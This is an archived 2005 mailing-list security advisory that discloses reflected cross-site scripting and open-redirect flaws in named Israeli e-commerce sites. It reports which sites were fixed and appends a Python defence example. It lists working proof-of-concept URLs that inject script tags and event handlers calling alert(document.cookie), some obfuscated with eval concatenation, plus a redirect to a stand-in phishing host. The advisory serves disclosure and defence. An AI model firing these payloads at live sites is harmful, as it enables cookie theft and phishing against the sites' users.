Full Disclosure mailing list archives
Leading Israeli e-commerce sites XSS vulnerabilities advisory
From: Aviv Raff <avivra () 012 net il>
Date: Mon, 10 Jan 2005 00:44:32 +0200
Leading Israeli e-commerce sites XSS vulnerabilities advisory

URL: http://www.raffon.net/advisories/commxss.html
Date: January 10, 2005
Author: Aviv Raff

Introduction

Many leading Israeli e-commerce sites are phishing enabled, and contain pages which allow injecting code that can execute arbitrary scripts.

Technical Details

Many leading Israeli e-commerce sites generate dynamic HTML web pages using user-submitted data, and data from other sources. Most of these sites do not filter the data before presenting it to the user, and therefore are vulnerable to Cross-Site Scripting. They allow injecting code that can execute arbitrary scripts, steal the user's cookie, or display fake pages.

P1000 web site allows redirecting to external pages using a simple query string input, which can be easily exploited by phishers.

Examples

NetAction:
http://www.netaction.co.il/search.php?qsn=<img%20src=Images/space.gif%20onload=alert(document.cookie)%20>
http://www.netaction.co.il/personal.php?formPersonalID="><img%20src=Images/space.gif%20onload=alert(document.cookie)%20>
http://www.netaction.co.il/contact.php?formFirstName="><img%20src=Images/space.gif%20onload=alert(document.cookie)%20>

P1000:
http://www.p1000.co.il/default.asp?urladd=http://www.phisher.com

Wallashops:
http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="><script>alert(document.cookie)</script>
http://www.wallashops.co.il/shopmind_portal_heb/main.asp?name="%20onmouseover=eval("al"%2B"ert(doc"%2B"ument.coo"%2B"kie)")%20"

Zap:
http://www.zap.co.il/gsearch.asp?keyword=<script>alert(document.cookie)</script>

GetIt:
http://www.getit.co.il/ie2/ProdList_Search.asp?sw1=<script>alert(document.cookie)</script>

Sakal Online:
http://www.sakal.co.il/jsp/pg/SearchResultNew.jsp?searchType=byName&keyWord=<script>alert(document.cookie)</script>

NfcShop:
http://shop.nfc.co.il/signin.asp?msg=<script>alert(document.cookie)</script>

Daka90:
http://daka90.ynet.co.il/Login/CdaPersonalAreaLogin/1,2141,,00.html?txtemail='><script>alert(document.cookie)</script>

Olsale:
http://www.olsale.co.il/olsale/Login.aspx?urlsource=><script>alert(document.cookie)</script>&type=1&rtype=1

Issta:
http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&price_id=3944&from_date='><script>alert(document.cookie)</script>10/04/2004&to_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml
http://www.issta.co.il/heb/flight_details.asp?product_id=2092&source_id=6&price_id=3944&from_date='%20onmouseover=alert(document.cookie)%20x='10/04/2004&to_date=31/12/2004&s=hp&file_name=main\regularflightBottom1.xml

Parsi:
http://www.parsi.co.il/SignIn.asp?referrer="><script>alert(document.cookie)</script>
http://www.parsi.co.il/SignIn.asp?referrer="><img%20src=/new_images/cat_p_dot.jpg%20onload=eval("alert(doc"%2B"ume"%2B"nt."%2B"co"%2B"okie)",10)%20>

Arkia:
http://www.arkia.co.il/click/cl_4005.main?p_domestic_yn="><iframe%20src="http://www.arkia.co.il/"%20onload="if%20(document.cookie!='')alert(document.cookie)"></iframe>

Printmall:
https://www.printmall.co.il/Artists/Join.asp?Artsts_FName="><script>alert(document.cookie)</script>

One (This is actually a leading sport website, but it has a paid premium section and also contains links to other e-commerce sites):
http://www.one.co.il/one/search.asp?data=<script>alert(document.cookie)</script>
http://www.one.co.il/search/MoreArticals.asp?data=<script>alert(document.cookie)</script>

Solutions

All of the sites were contacted via email, or a suggestion form on 27/12/2004.
Netaction, P1000, GetIt, Daka90, Arkia and Printmall sites have already fixed the vulnerabilities.
Wallashops, Issta and Parsi sites are partly fixed.
Other sites are still vulnerable, and one should be careful following a link to those sites, or giving confidential information.

Disclaimer:
The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind.

--
Copyright © 2004-2005 Aviv Raff.
--
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
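
The two fixes the advisory's findings call for, output encoding of reflected parameters and validation of redirect targets, shown as an added Python example that is not part of the original advisory or of any listed site's code. The function names, the page template and the allow-listed hosts (shop.example, pay.shop.example) are assumptions.

```python
import html
from urllib.parse import urlsplit

# Assumption: the only external hosts this hypothetical shop redirects to.
ALLOWED_REDIRECT_HOSTS = {"shop.example", "pay.shop.example"}


def render_search_page(keyword: str) -> str:
    """Reflect a request parameter in element content and a quoted attribute."""
    # quote=True encodes & < > " and ', so the value cannot close the tag,
    # open a new element, or end an attribute delimited by either quote.
    # This is only sufficient because the template quotes the attribute;
    # an unquoted attribute can be broken out of with a plain space.
    safe = html.escape(keyword, quote=True)
    return (
        f"<p>Results for: {safe}</p>\n"
        f'<input type="text" name="keyword" value="{safe}">'
    )


def safe_redirect_target(url: str, default: str = "/") -> str:
    """Return url if it is a local path or an allow-listed https host."""
    # Backslashes and control characters are normalised differently by
    # browsers and by urlsplit, so reject them before parsing.
    if url != url.strip() or any(c in url for c in "\\\r\n\t"):
        return default
    try:
        parts = urlsplit(url)
    except ValueError:
        return default
    if not parts.scheme and not parts.netloc:
        # Relative reference: accept a same-site absolute path only.
        # A leading "//" (or more) is read by browsers as a host name.
        if url.startswith("/") and not url.startswith("//"):
            return url
        return default
    if parts.scheme == "https" and parts.hostname in ALLOWED_REDIRECT_HOSTS:
        return url
    return default


if __name__ == "__main__":
    # Constructed inputs in the shape of the advisory's query strings.
    print(render_search_page('"><script>alert(document.cookie)</script>'))
    print(safe_redirect_target("http://www.phisher.com"))
```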